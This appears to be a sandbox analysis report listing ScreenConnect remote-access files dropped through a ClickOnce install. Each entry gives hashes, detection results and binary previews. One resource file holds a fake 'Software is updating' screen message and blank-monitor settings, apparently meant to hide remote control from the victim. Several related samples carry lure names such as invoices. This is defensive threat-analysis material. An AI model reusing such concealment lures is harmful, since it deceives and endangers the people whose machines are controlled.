C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.55954927098304
Encrypted:	false
SSDEEP:	96:pGvXQeV+Ww8U45usseAugayzhe9Ug3Ahg4C5koNOrf:pqPJjup6ahe9Ehvoq
MD5:	BFCAF1741853FCFCA3703B0FC944FE04
SHA1:	3E08B2E37499DED5B59D51487E65A4981AA1FF11
SHA-256:	0073E4899DDF78A17399D875E96984E6DD8DD64ACDBD49B37B3BDB20E452C6F7
SHA-512:	CB5222028A1ABECA170B99098C1146B9230094DD2A696BDD3F6D04338BE6C82AA739ABB0EB68305893336E4B2F44F293929BB8747A3EDB7CCC1C7ABC603F73E6
Malicious:	false
Preview:	PcmH...........mz..g,...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...4.......\.......d...(...\|...................(...............L...........0...............................................L...............................................L...............................................L...............................................L...............................................L...............................................L...nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 7LC2izrr9u.exe, Detection: malicious, Browse Filename: E-BILL#226.Client.exe, Detection: malicious, Browse Filename: E-BILL#226.Client.exe, Detection: malicious, Browse Filename: Statement.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 9YOOBuBZtj.exe, Detection: malicious, Browse Filename: 6Zx9GI028y.exe, Detection: malicious, Browse Filename: 4ZVhm9dOfO.exe, Detection: malicious, Browse Filename: y4FSQMICGJ.exe, Detection: malicious, Browse Filename: 9YOOBuBZtj.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 7LC2izrr9u.exe, Detection: malicious, Browse Filename: E-BILL#226.Client.exe, Detection: malicious, Browse Filename: E-BILL#226.Client.exe, Detection: malicious, Browse Filename: Statement.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 9YOOBuBZtj.exe, Detection: malicious, Browse Filename: 6Zx9GI028y.exe, Detection: malicious, Browse Filename: 4ZVhm9dOfO.exe, Detection: malicious, Browse Filename: y4FSQMICGJ.exe, Detection: malicious, Browse Filename: 9YOOBuBZtj.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.Override.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	4.9739376290794715
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsbxMHwercD:rHy2DLI4MWoj12K9cAudMHcD
MD5:	5A9944427C35328CB2D7E201CD705C32
SHA1:	C58F7761A80CC65E12CC48AD459151DD7E02B2EA
SHA-256:	333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
SHA-512:	AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.Override.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	257
Entropy (8bit):	4.896176001960815
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
MD5:	C72D7889B5E0BB8AC27B83759F108BD8
SHA1:	2BECC870DB304A8F28FAAB199AE6834B97385551
SHA-256:	3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
SHA-512:	2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1970
